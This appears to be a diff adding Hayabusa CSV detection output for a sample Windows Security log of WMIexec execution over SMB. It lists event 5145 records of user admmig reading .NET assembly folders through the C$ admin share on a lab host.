+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
